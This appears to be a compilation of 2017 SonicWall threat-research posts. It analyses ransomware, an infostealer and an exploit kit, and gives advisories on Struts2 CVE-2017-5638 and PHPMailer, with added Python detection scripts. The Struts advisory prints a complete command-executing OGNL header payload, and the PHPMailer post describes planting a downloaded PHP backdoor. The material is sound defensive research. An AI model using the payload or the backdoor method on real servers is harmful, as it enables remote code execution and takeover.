Sage 2.2 updated with audio alert and reduced ransom (March 29th, 2017)

The Sage ransomware (covered in a previous SonicAlert) continues to be developed by cyber criminals and has recently received a minor update. As usual, this ransomware encrypts personal documents, images, databases, videos and other files, rendering them unusable. Alongside some refinements to its alert page, it now uses the Windows built-in text-to-speech engine to play an audio alert that informs the user of the infection and the encryption of files. Additionally, the cost of decryption, previously $2000 USD, has been reduced to $800 USD.

Infection Cycle:

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • %SYSTEMROOT%\!HELP_SOS.hta
  • %ALLUSERSPROFILE%\Desktop\!HELP_SOS.hta
  • %ALLUSERSPROFILE%\Documents\!HELP_SOS.hta
  • %APPDATA%\f1.hta
  • %APPDATA%\En3QVWV9.exe [Detected as GAV: Sage.A (Trojan)]
  • %APPDATA%\Microsoft\Speech\Files\UserLexicons\SP_029A022514CA4689BAFB15AF07CD496A.dat
  • %USERPROFILE%\Desktop\!HELP_SOS.hta
  • %USERPROFILE%\Local Settings\Temp\aV2.bmp
  • %USERPROFILE%\My Documents\!HELP_SOS.hta
  • %SYSTEM32%\CatRoot2\tmp.edb

The Trojan adds the following keys to the registry:

  • HKEY_CLASSES_ROOT\.sage @ "sage.notice"
  • HKEY_CLASSES_ROOT\sage.notice\DefaultIcon @ "%WinDir%\system32\shell32.dll,47"
  • HKEY_CLASSES_ROOT\sage.notice\FriendlyTypeName @ "encrypted by SAGE"
  • HKEY_CLASSES_ROOT\sage.notice\shell\open\command @ "mshta.exe "%APPDATA%\f1.hta" "%1""
  • HKEY_CURRENT_USER\Software\Microsoft\Speech\Voices DefaultTokenId "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\MSSam"
  • HKEY_CURRENT_USER\Software\Classes\.sage @ "sage.notice"
  • HKEY_CURRENT_USER\Software\Classes\htafile\DefaultIcon @ "%WinDir%\system32\shell32.dll,44"
  • HKEY_CURRENT_USER\Software\Classes\sage.notice\DefaultIcon @ "%WinDir%\system32\shell32.dll,47"
  • HKEY_CURRENT_USER\Software\Classes\sage.notice\FriendlyTypeName @ "encrypted by SAGE"
  • HKEY_CURRENT_USER\Software\Classes\sage.notice\shell\open\command @ "mshta.exe "%APPDATA%\f1.hta" "%1""

aV2.bmp contains the following image that is displayed on the desktop background after infection:

!HELP_SOS.hta contains the following image that is displayed in the foreground:

Sage encrypts files and renames them with a .sage file extension. During encryption a key is sent to a remote server:

If there is no response from the key server, Sage attempts to make contact via UDP. It broadcasts the key to a variety of predefined IP addresses in the hope that it will make it to the key server:

Sage 2.2 now contains an audio alert that is played when the alert images are displayed. It is repeated every 5 minutes. Below is a capture of the audio:

Transcript:

      Attention... Attention... this is not a test. All you documents, databases and other
      important files were encrypted and Windows cannot restore them without special software.
      User action is required as soon as possible to recover the files.

      All you documents, databases and other important files were encrypted and Windows cannot
      restore them without special software. User action is required as soon as possible to
      recover the files.

The links given in !HELP_SOS.hta lead to the following web pages:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Sage.A (Trojan)
  • GAV: Sage.B (Trojan)

Apache Struts2 CVE-2017-5638 Vulnerability Follow-up (Mar 24, 2017)

In a previous SonicAlert, we warned about a critical remote code execution vulnerability (CVE-2017-5638, S2-045) in Apache Struts2. A remote attacker could exploit this vulnerability by sending a crafted HTTP request with a malformed Content-Type value. A successful attack could execute arbitrary commands on the web server.

SonicWall customers are protected by the following signatures:

  • IPS: 12656 – Apache Struts 2 Jakarta Remote Code Execution (S2-045) 1
  • IPS: 12660 – Apache Struts 2 Jakarta Remote Code Execution (S2-045) 2

While the SonicWall Threat Research Team keeps watching CVE-2017-5638, we observed that since March 23 the number of firewalls reporting CVE-2017-5638 exploits has nearly doubled.

In the meantime, the number of incidents has surged to 50 times the average of the past two weeks.

It is possible that attackers are testing and exploiting CVE-2017-5638 with newly developed (and more powerful) tools. SonicWall urges all our customers to review their firewall logs and make sure they are running the latest version of Apache Struts2.

New variant of Atros InfoStealer actively spreading in the wild. (Mar 24, 2017)

The Sonicwall Threats Research team observed reports of a new variant of Atros InfoStealer actively spreading in the wild.

Atros malware gathers confidential information from the computer, such as login details, passwords and financial information, and sends it to its own C&C server.

Infection Cycle:

The Malware adds the following files to the system:

  • %Userprofile%\Application Data\oougw.exe

  • %Userprofile%\Local Settings\Application Data\GDIPFONTCACHEV1.DAT

  • %Userprofile%\All Users\Application Data\[Computer Name][Date].jpg [computer screen shot]

The Malware adds the following keys to the Windows registry to ensure that the Trojan runs during startup:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cd482369-09b5-4f6f-929d-87c40c6be1bc

    • "%Userprofile%\Application Data\oougw.exe"
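Both the Sage registry keys listed earlier (a .sage file association whose open command runs mshta.exe on an .hta in %APPDATA%) and the Atros Run-key entry above are artifacts a responder can hunt for in a `reg export` of a suspect host. The following is an added example, not code from the original alert or from SonicWall: it parses the text format `reg export` produces (.reg), then applies two rules, one for autorun values pointing into user-writable directories and one for file-type associations that open via a script host. The sample .reg content is constructed from the keys this page lists plus two benign entries; the script-host and user-writable-path lists are assumptions chosen for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the text format produced by `reg export` (.reg), built
# from the keys this page lists for Sage 2.2 and Atros plus two benign entries;
# it was not captured from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.sage]
@="sage.notice"

[HKEY_CLASSES_ROOT\sage.notice\shell\open\command]
@="mshta.exe \"%APPDATA%\\f1.hta\" \"%1\""

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"cd482369-09b5-4f6f-929d-87c40c6be1bc"="\"%Userprofile%\\Application Data\\oougw.exe\""
'''

# Assumed lists for the example: programs that turn "open this file" into script
# execution, and path fragments that mean "writable by an ordinary user".
SCRIPT_HOSTS = ('mshta.exe', 'wscript.exe', 'cscript.exe', 'powershell.exe')
USER_WRITABLE = ('%userprofile%', '%appdata%', '%localappdata%', '%temp%',
                 '\\application data\\', '\\users\\')
RUN_KEY_SUFFIXES = ('\\currentversion\\run', '\\currentversion\\runonce')


def _unescape(s: str) -> str:
    # Undo .reg escaping (backslash-backslash and backslash-quote) in one pass
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key_path: {value_name: data}}; REG_SZ data is unescaped,
    other value types (dword:, hex:) are kept verbatim."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        m = re.match(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$', line)
        if not m:
            continue
        name = '(Default)' if m.group(1) == '@' else _unescape(m.group(2))
        data = m.group(3)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_suspicious(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Apply the two rules and return (key_path, value_name, reason) for every hit."""
    findings = []
    for path, values in keys.items():
        lower = path.lower()
        # Rule 1: autorun entries whose command lives in a user-writable directory
        if lower.endswith(RUN_KEY_SUFFIXES):
            for name, data in values.items():
                if any(frag in data.lower() for frag in USER_WRITABLE):
                    findings.append((path, name, 'autorun from user-writable path'))
        # Rule 2: a file-type association whose open command invokes a script host
        if lower.endswith('\\shell\\open\\command'):
            cmd = values.get('(Default)', '').lower()
            if any(host in cmd for host in SCRIPT_HOSTS):
                findings.append((path, '(Default)', 'file association opens via script host'))
    return findings


if __name__ == '__main__':
    for path, name, reason in find_suspicious(parse_reg(SAMPLE_REG)):
        print(f'{reason}: [{path}] {name}')
```

On the sample above the two malicious entries are reported and the two benign ones (notepad for .txt, a system tray helper under %windir%) are not; against a real export, run `reg export HKCR out.reg` and `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg` and feed the files to `parse_reg`.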

Once the computer is compromised, the malware copies its own executable to the %Userprofile% folder.

The malware's goal is to collect as much data as possible; the attacker's profit depends on the amount of user information collected, so more information collected leads to higher profits.

The malware also performs key logging, takes screen shots, and steals clipboard data from target user.

The malware installs a keylogger on the target machine and extracts passwords from the following web browsers:

  • Chrome

  • Firefox

  • Internet Explorer

  • Opera

  • Safari

The malware saves the data into a Browsers.txt file and transfers it to its own C&C server.

Command and Control (C&C) Traffic

Atros performs C&C communication over port 80.

The malware sends the victim's computer information to its own C&C server in the following format; here is an example:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Downloader.A_986 (Trojan)

Alma Ransomware delivered via RIG Exploit Kit (March 17, 2017)

The SonicWall Threat Research Team is still observing a steady increase in ransomware. A ransomware variant known as Alma has been observed being delivered via the RIG Exploit Kit to unsuspecting users. Exploit kits such as RIG are often hidden on compromised web servers and are used as part of a drive-by technique to infect visitors. Alma is yet another ransomware variant using the usual techniques for extorting money from infected users.

Infection Cycle:

The authors of the ransomware have tried to make the executable seem genuine by indicating that it was created by Apple Inc.:

The Trojan makes the following POST request to a hidden server on the TOR network:

The request is encoded using base64 encoding. The decoded message is as follows:

      p=OZZHTu0LitDed546XtOj1&a=Windows Defender&t=1489618916&r=hgshsgfh&o=6.3.9600&v=d42889198027beae49&s=2382&l=1033&e=vmnz&u=USER

OZZHTu0LitDed546XtOj1 is the encryption key used to encrypt/decrypt files. d42889198027beae49 is a unique user infection ID. The rest of the information contains data on any installed antivirus software, Windows version number, the current user and the file extension used for encrypted files.
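When this beacon is captured in a proxy log or packet capture, the fields above are what an incident responder wants pulled out, since the key and infection ID are what a decryptor would need. The following is an added example, not code from the original alert: it base64-decodes a captured POST body, splits the `key=value&...` message into fields, and labels them using the meanings the text above gives. The sample body is constructed by re-encoding the decoded message shown on this page; the required-field set is an assumption derived from that one message.

```python
import base64
from typing import Dict
from urllib.parse import parse_qs

# Meaning of each field, taken from the page's description of the decoded message.
# The remaining fields (t, r, s, l) are not explained there and are left unlabelled.
FIELD_MEANING = {
    'p': 'encryption key',
    'v': 'infection ID',
    'a': 'installed antivirus',
    'o': 'Windows version',
    'u': 'current user',
    'e': 'extension used for encrypted files',
}
# Assumed for this example: fields a beacon must carry to be treated as Alma's format
REQUIRED_FIELDS = ('p', 'v', 'a', 'o', 'u', 'e')

# Constructed sample: the decoded message from this page, re-encoded the way it
# travels in the POST body (the page shows only the decoded form).
DECODED_MESSAGE = ('p=OZZHTu0LitDed546XtOj1&a=Windows Defender&t=1489618916&r=hgshsgfh'
                   '&o=6.3.9600&v=d42889198027beae49&s=2382&l=1033&e=vmnz&u=USER')
SAMPLE_BODY = base64.b64encode(DECODED_MESSAGE.encode()).decode()


def decode_beacon(body_b64: str) -> Dict[str, str]:
    """Base64-decode a captured POST body and split it into its key=value fields."""
    raw = base64.b64decode(body_b64).decode('utf-8', errors='replace')
    parsed = parse_qs(raw, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def looks_like_alma(fields: Dict[str, str]) -> bool:
    """True when every field of the Alma beacon format is present."""
    return all(k in fields for k in REQUIRED_FIELDS)


def describe(fields: Dict[str, str]) -> Dict[str, str]:
    """Map the raw fields to human-readable labels for the incident record."""
    return {FIELD_MEANING.get(k, f'unlabelled field {k}'): v for k, v in fields.items()}


if __name__ == '__main__':
    fields = decode_beacon(SAMPLE_BODY)
    print('Alma beacon' if looks_like_alma(fields) else 'unknown format')
    for label, value in describe(fields).items():
        print(f'{label}: {value}')
```

Because `parse_qs` percent-decodes its input, the same function works whether or not the sample uses URL encoding for the space in the antivirus name.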

Files with the following extensions are targeted for encryption:

      .1cd, .3ds, .3gp, .accdb, .ai, .ape, .asp, .aspx, .bc6, .bc7, .bmp, .cdr, .cer

      .cfg, .cfgx, .cpp, .cr2, .crt, .crw, .csr, .csv, .dbf, .dbx, .dcr, .dfx, .dib

      .djvu, .doc, .docm, .docx, .dwg, .dwt, .dxf, .dxg, .eps, .htm, .html, .ibank

      .indd, .jfif, .jpe, .jpeg, .jpg, .kdc, .kwm, .max, .md, .mdb, .mdf, .odb, .odc

      .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pdf, .pef, .pem, .pfx, .php

      .pl, .png, .pps, .ppt, .pptm, .pptx, .psd, .pst, .pub, .pwm, .py, .qbb, .qbw

      .raw, .rtf, .sln, .sql, .sqlite, .svg, .tif, .tiff, .txt, .vcf, .wallet, .wpd

      .xls, .xlsm, .xlsx, .xml

Upon reverse engineering the executable, the read, encrypt, write and delete functions can be seen without much effort:

The following image is displayed onscreen, giving instructions on how to recover encrypted files. At the time of writing the server had been removed (possibly by authorities) from the TOR network.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: AlmaLocker.A (Trojan)

CeBIT 2017: Real-Time Breach Prevention with SonicWall, Your Partner in Cybersecurity

Join SonicWall at CeBIT 2017 on the 20-24th of March, in Hannover, Germany.

With “Experience the Digital Transformation” as this year’s theme, IT Security will be at the forefront of the visitors’ agenda, alongside other leading-edge technologies, such as artificial intelligence, humanoid robots and applications of virtual reality. But security can’t be an afterthought! It’s at the core of everything organizations do. Without it, they can’t grow, can’t move forward and can’t innovate. Without effective security, too often, organizations default to inaction, to not moving forward. And they will have no choice but to say NO to their digital transformation.

The explosion of advanced threats is rendering legacy network security solutions obsolete. Ransomware, zero-day threats, encrypted malware and other attacks expose organizations to breaches that threaten business viability and compliance requirements. This creates the need for a new breed of network security solutions that deliver more than just breach detection. Organizations require breach prevention capable of handling threats delivered by any vehicle including web and email, over encrypted or unencrypted traffic, across any network including wired and wireless, and for not only PCs but tablets, smartphones and IoT devices.

As an exhibitor in Hall 6, Stand E03, SonicWall with five of its German partners – Data_Sec, Tarador, Die Netz-Werker, Pallas and Synexus – will demonstrate cutting-edge network security solutions that enable our customers to stay ahead of cybercriminals in the continually evolving cyber arms race, allowing them to embrace their digital transformation whilst meeting their compliance requirements.

Speaking of which, the General Data Protection Regulation (GDPR) goes into effect in May 2018. It will affect companies of all sizes, in all regions and in all industries that hold EU citizens' personal information. Victims of a data breach once the GDPR is in effect risk significant fines (up to 20 million euros or four percent of their global revenues) and a loss of reputation that could bring the business to its knees. So don't put off early consideration of GDPR: the scale, complexity, cost and business criticality of GDPR mean that it will take most companies a long time to achieve full compliance. Start now if you haven't done so.

SonicWall’s on-site presentations (we will have more than 45 exciting presentations), demos (including live hacking sessions), and experts will empower you and your organization’s networks to overcome numerous crimes targeting weak spots in your network. You will definitely want to see a demo of our award-winning multi-engine sandbox, SonicWall Capture ATP, which scans network traffic to prevent zero-day and advanced threats. We will show how we can block unknown files until Capture reaches a verdict, which is made possible by a highly effective multi-engine sandbox. Near real-time verdicts are rendered by our highly efficient GRID cloud threat network. Our next-gen firewalls also detect malware using SSL or TLS encryption to cloak malicious behavior, C&C communication and exfiltration.

Because email is a constant target for attacks, we will showcase our revolutionary technology for email security, which now integrates with our award-winning Capture Advanced Threat Protection (ATP) Service. SonicWall's Email Security solutions allow you to deploy a next-gen solution to protect email files, stop phishing and block ransomware. Don't miss the opportunity to speak to our experts and learn how you can block spoofed email and zero-day attacks with our hosted service or our on-premise enterprise email security solutions.

Today's ever-growing number of connected devices used by mobile workers and vendors requires organizations to rethink their needs for IoT security. SonicWall's access security and network segmentation deliver the right level of access to your mobile workers and reduce the threat surface. Proper network segmentation is required for critical business apps and data to ensure better protection. With our Secure Mobile Access solutions, you can define granular access policies, enforce multi-factor authentication and monitor all activities for compliance.

Start securing your digital transformation with SonicWall, Stand E03 in Hall 6, where you will be able to experience first-hand how SonicWall next-gen firewalls, access security and email security offer the power to be competitive and fearless.

We are looking forward to seeing you soon. Bis Bald as they say in Germany!

Before you go, be sure to download our threat report.

A new updated version of Terror Exploit Kit observed by SonicWall (March 13th, 2017)

A new updated version of Terror Exploit Kit observed by SonicWall

Summary:

Terror exploit kit is a new exploit kit, observed in the wild since the beginning of this year. The SonicWall Threat Research team has observed a new version of the Terror exploit kit, which now contains code stolen from both the RIG and Sundown exploit kits. The landing page of the Terror exploit kit consists of a JavaScript that appears to be stolen from RIG, followed by another script stolen from the Sundown exploit kit. These stolen JavaScripts are followed by embedded Flash exploits. No obfuscation is seen in this exploit kit, and neither the landing page nor the payload is encrypted.

Technical Details:

The figure below shows the URL pattern of the landing page, exploits and payload of the observed Terror exploit kit version.

Figure 1: Terror EK URL patterns


Landing Page:

The Terror EK landing page contains two JavaScripts and two Flash exploits embedded in it. Below is the image of the first JavaScript. The code looks like the de-obfuscated RIG exploit kit: the names of the sub-functions inside function exp are exactly the same.

Figure 2: Landing page JavaScript functions


A few strings found in the landing page are Il1Iu, Il1Ix, Il1Ica, Il1Ida, function exp(_url, _key), function ush(u, k), function hex(num, width), leakMem, function fire() and function tRIGgerBug, which should help future classification of this variant.

Below is the image of the second JavaScript present in Terror EK landing page.

Figure 3: VBScript embedded in JavaScript


This JavaScript injects malicious VBScript into the DOM dynamically using JavaScript's document.write method, as shown in Figure 3. A similar technique is used in the Sundown exploit kit. The injected VBScript is identified as exploiting the vulnerability described in CVE-2016-0189.

Below is the image showing the two embedded flash exploits.

Figure 8: Malicious SWF Objects

This variant tries to infect victims by exploiting vulnerabilities in Adobe Flash Player, as shown in Figure 8 above. The kit launches two Flash movies, which are malicious exploits; the shellcode is passed to these exploits as an argument via the FlashVars parameter and is executed after successful exploitation. On execution of the shellcode, the payload malware is downloaded and installed onto the victim's system.
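The three traits described in this section (the RIG-derived function and variable names, VBScript injected through document.write, and SWF objects that receive their argument through FlashVars) are exactly what a landing-page classifier keys on. The following is an added example, not code from the original alert or from SonicWall: it scans an HTML body for the strings listed above and for the two injection patterns, and returns a verdict when enough of them coincide. The sample page is constructed for the example (function stubs carrying only the listed names, a placeholder FlashVars value), and the "three or more strings plus an injection pattern" threshold is an assumption.

```python
import re
from typing import Dict, List

# Landing-page strings the page lists as characteristic of this Terror EK variant
RIG_STRINGS = ("Il1Iu", "Il1Ix", "Il1Ica", "Il1Ida", "function exp(_url, _key)",
               "function ush(u, k)", "function hex(num, width)", "leakMem",
               "function fire()", "tRIGgerBug")
# VBScript written into the DOM via document.write (the Sundown-style injection)
VBSCRIPT_INJECT_RE = re.compile(r"document\.write\s*\([^)]*VBScript", re.I)
# <param name="FlashVars"> on an embedded SWF object
FLASHVARS_RE = re.compile(r"""<param[^>]+name=["']FlashVars["']""", re.I)
SWF_RE = re.compile(r"\.swf\b", re.I)

# Constructed sample: stubs that only carry the listed names, no exploit logic.
SAMPLE_HTML = """<html><body>
<script>
var Il1Iu = 0, Il1Ix = 0;
function exp(_url, _key) { return _url + _key; }
function ush(u, k) { return u; }
function hex(num, width) { return num.toString(16); }
function fire() { }
</script>
<script>
document.write('<script language="VBScript">' + 'Dim constructed_placeholder' + '<\\/script>');
</script>
<object type="application/x-shockwave-flash" data="/movie1.swf">
  <param name="FlashVars" value="sc=CONSTRUCTED_PLACEHOLDER">
</object>
<object type="application/x-shockwave-flash" data="/movie2.swf">
  <param name="FlashVars" value="sc=CONSTRUCTED_PLACEHOLDER">
</object>
</body></html>"""


def classify_landing_page(html: str) -> Dict[str, object]:
    """Collect the indicators and decide whether the page matches this variant."""
    hits: List[str] = [s for s in RIG_STRINGS if s in html]
    vbs_injection = bool(VBSCRIPT_INJECT_RE.search(html))
    flashvars = len(FLASHVARS_RE.findall(html))
    swf_refs = len(SWF_RE.findall(html))
    # Assumed threshold: several RIG-derived names plus at least one injection pattern
    verdict = len(hits) >= 3 and (vbs_injection or flashvars > 0)
    return {
        "rig_strings": hits,
        "vbscript_injection": vbs_injection,
        "flashvars_params": flashvars,
        "swf_refs": swf_refs,
        "terror_ek": verdict,
    }


if __name__ == "__main__":
    result = classify_landing_page(SAMPLE_HTML)
    print("Terror EK landing page" if result["terror_ek"] else "no match")
    print(result)
```

Run against a fetched page body from a proxy cache or sandbox, the returned dictionary is the evidence to attach to the alert, and the individual counters make it easy to tune the threshold as the kit changes.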

During our analysis we observed that the payload has capabilities to disable installed security products, steal credentials, open ports (listening for commands from a remote server) and also act as a downloader.

Solution provided by SonicWall:

Keeping software up to date will help in mitigating this exploit kit. The SonicWall Threat Research team will keep on monitoring this exploit kit and its evolution to update signatures as required.

SonicWall Gateway AntiVirus provides protection against this threat via the following signatures:

Payload: Downloader.A_973

Exploit: CVE-2015-5122.A_2, MalSWF

Landing Page: Terror_EK.LP

Critical Vulnerability on Apache Struts2

A critical remote code execution vulnerability, CVE-2017-5638, has been reported in Apache Struts2, affecting Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. A remote attacker could exploit this vulnerability by sending a crafted HTTP request with a malformed Content-Type value. A successful attack could execute arbitrary commands on the web server.

As of Mar 6th, this vulnerability has been addressed in Security Bulletin S2-045, and an exploit was already in the wild in Metasploit.

The vulnerability is triggered by OGNL expressions injected through the Content-Type header. When the Content-Type of an HTTP request is set to the following content, the command "whoami" will be executed:

      %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
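A header like the one above is easy to tell apart from any legitimate Content-Type: a media type is `type/subtype` with optional `;` parameters, and nothing in that grammar contains `%{`, `#_memberAccess` or `@ognl.`. The following is an added example, not code from the original alert or SonicWall's IPS signature: it checks a Content-Type value for OGNL markers and for basic media-type shape, then runs that check over a few constructed, tab-separated request records of the kind a web-server or proxy log would hold (client IP, request line, Content-Type). The marker list and the log format are assumptions made for the example.

```python
import re
from typing import List, Optional, Tuple

# A well-formed media type is "type/subtype", optionally followed by ";" parameters.
MEDIA_TYPE_RE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+(\s*;.*)?$")

# Substrings characteristic of OGNL evaluation (see the header shown above). None of
# them has any business in a Content-Type value. Assumed list for this example.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl.", "OgnlContext", "ProcessBuilder")


def inspect_content_type(value: str) -> Optional[str]:
    """Return None for a plausible Content-Type, otherwise the reason it is suspicious."""
    for marker in OGNL_MARKERS:
        if marker in value:
            return f"OGNL marker {marker!r} in Content-Type"
    if not MEDIA_TYPE_RE.match(value.strip()):
        return "Content-Type is not a well-formed media type"
    return None


# Constructed log records, one request per line: client IP, request line, Content-Type.
# The third record reuses only the opening fragment of the header shown on this page.
SAMPLE_LOG = [
    "203.0.113.5\tPOST /struts2-showcase/index.action\tmultipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk",
    "203.0.113.9\tPOST /api/upload\tapplication/json",
    "198.51.100.7\tPOST /index.action\t%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}",
    "198.51.100.8\tPOST /index.action\tmultipart/form-data; %{#_memberAccess}",
    "192.0.2.44\tGET /index.action\ttext/html; charset=utf-8",
]


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Run the check over log records and return (client_ip, reason) for each hit."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        ip, _request, content_type = line.split("\t", 2)
        reason = inspect_content_type(content_type)
        if reason:
            hits.append((ip, reason))
    return hits


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

The marker test runs first so that a payload hidden behind a valid-looking prefix (the fourth record) is still caught; the shape test then catches anything the marker list misses.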

Details of the vulnerability:

The vulnerability is caused by a logic error when handling an unknown Content-Type header. During exception handling, the JakartaMultiPartRequest.buildErrorMessage method uses the localizedTextUtil.findText method to process the request content, and the latter contains a feature that should not be supported here: it searches for OGNL expressions inside the request and eventually executes them.

The JakartaMultiPartRequest.parse method parses the HTTP request header. When an unknown Content-Type is passed in, it calls the buildErrorMessage method to handle it (as the name indicates, it generates an error message):


buildErrorMessage then calls the method localizedTextUtil.findText to parse the message. The body of the message is passed in as the 4th parameter:

In the official patch, buildErrorMessage was fixed to apply the necessary filtering before calling findText.

In the findText method, the OGNL expressions are parsed and executed.

We suggest that users with an affected version of Struts2 apply the patch as soon as possible. The SonicWall IPS team has also developed the following signature to identify and stop the attacks:

IPS: 12656 – Apache Struts 2 Jakarta Remote Code Execution (S2-045)

CVE-2017-5638 incidents in last 6 months

References:

[1] https://github.com/rapid7/metasploit-framework/issues/8064
[2] https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a
[3] https://dist.apache.org/repos/dist/release/struts/2.3.20.1/
[4] http://blog.nsfocus.net/apache-struts2-remote-code-execution-vulnerability-analysis-program/
[5] https://cwiki.apache.org/confluence/display/WW/S2-045

How To Own A Web Server By Writing An Email (Jan 4, 2017)

PHPMailer allows website visitors to send emails to the website's owners or admins. Recently, a vulnerability was discovered that allows remote attackers to execute code.

PHPMailer validates email addresses according to RFC 3696. However, according to the specification, blank spaces and double quotes are allowed. By crafting an email address string containing blank spaces and double quotes, an attacker can inject code that causes PHPMailer's mail() function to call /usr/bin/sendmail differently.

Test Website

For our tests, we crafted a webpage using the following html form:

Fig. 1

The HTML code is shown as:

Fig. 2

While send_form_email.php is as follows:

Fig. 3

Running The Exploit

We attempt to exploit the vulnerability by typing the following into the web page:

Fig. 4

This generates a file named phpcode.php in /var/www/html/cache/. Looking at the file, we see that one line contains the PHP code we placed in the comments section:

Fig. 5

By entering the URL to the generated file, we will see the following in the browser:

Fig. 6

Owning

So far, we know the following:

  1. From Fig. 2, there is a limit to the number of characters we can send in the message.
  2. From Fig. 5, the injected code is placed in one line in the generated file.
  3. We cannot yet “execute” random code.

Basically, our next step requires us to send code that:

  1. Is short enough to fit the character limit.
  2. Does not require line breaks.
  3. Gives us a means to "execute" code.

By using libcurl, we can have the web server download other files for us.

Fig. 7

The above, when executed, downloads a file and saves it as backdoor.php. Executing the generated phpcode.php file in the browser, we see only the following:

Fig. 8

However, in the background, the web server is then instructed to download a file and save it as backdoor.php.

Going to backdoor.php, we see the following:

Fig. 9

This is basically a PHP backdoor we can use to execute instructions.

Prevention Methods:

A simple regular expression check can be used to verify the email address, as follows:

Fig. 10
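The point of the check in Fig. 10 is that the permissive RFC 3696 grammar (which allows a quoted local part containing spaces and double quotes) is not the right gate for a value that will end up on a sendmail command line; a conservative character class that excludes both is. The following is an added example, not code from the original alert (the page's own check is in PHP): it contrasts an RFC 3696-style pattern with the strict pattern and wraps the strict one in the gate a form handler should apply before passing the address on. Both regular expressions are assumptions written for the example.

```python
import re
from typing import Tuple

# Building blocks of an RFC 3696-style local part: either a quoted string, which may
# contain spaces, or a run of the unquoted "atom" characters.
QUOTED_LOCAL = r'"[^"\\]*"'
ATOM_LOCAL = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+"
DOMAIN = r"[A-Za-z0-9.-]+\.[A-Za-z]{2,}"

# What a permissive validator accepts: "john doe"@example.com is legal here.
PERMISSIVE_RE = re.compile(r"^(?:" + QUOTED_LOCAL + "|" + ATOM_LOCAL + r")@" + DOMAIN + r"$")

# The conservative check the page recommends: no quotes, no spaces, a small safe set.
STRICT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@" + DOMAIN + r"$")


def rfc3696_valid(address: str) -> bool:
    """Syntactic validity under the permissive grammar (what PHPMailer was relying on)."""
    return bool(PERMISSIVE_RE.match(address))


def strict_valid(address: str) -> bool:
    """Validity under the conservative pattern; rejects quoted local parts outright."""
    return bool(STRICT_RE.match(address))


def check_sender(address: str) -> Tuple[bool, str]:
    """Gate to apply before the address reaches anything that builds a sendmail command."""
    if not strict_valid(address):
        return False, "rejected: address contains characters outside the safe set"
    return True, "accepted"


if __name__ == "__main__":
    # Constructed inputs: a normal address and a legal-but-unsafe quoted local part
    for addr in ("user.name+tag@example.co.uk", '"john doe"@example.com'):
        print(f'{addr!r}: rfc3696={rfc3696_valid(addr)} strict={strict_valid(addr)} -> {check_sender(addr)[1]}')
```

The strict pattern rejects some addresses that are technically legal, which is the intended trade-off for a contact form: the form loses nothing by refusing a quoted local part, and the mail path never sees whitespace or quotes.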

The SonicWALL Threat Research Team has researched this vulnerability and has the following signatures in place to protect customers:

  • WAF:9016 – PHP Injection Attack
  • WAF:9039 – PHP Injection Attack 2

CRN Recognizes SonicWall’s Steve Pataky as 2017 Channel Chief

I am honored to highlight my esteemed colleague, Steve Pataky, Vice President of Worldwide Sales at SonicWall, who was just named a CRN Channel Chief, one of the Top 50 Most Influential Channel Chiefs of 2017. Steve not only brings with him more than 25 years of experience and an industry reputation for architecting and executing global channel and go-to-market strategies, but also a deep and genuine passion for helping partners succeed. He has been a recipient of the CRN Channel Chiefs award for several years, and was among the magazine's 50 Most Influential Channel Chiefs in 2014, 2015 and again this year.

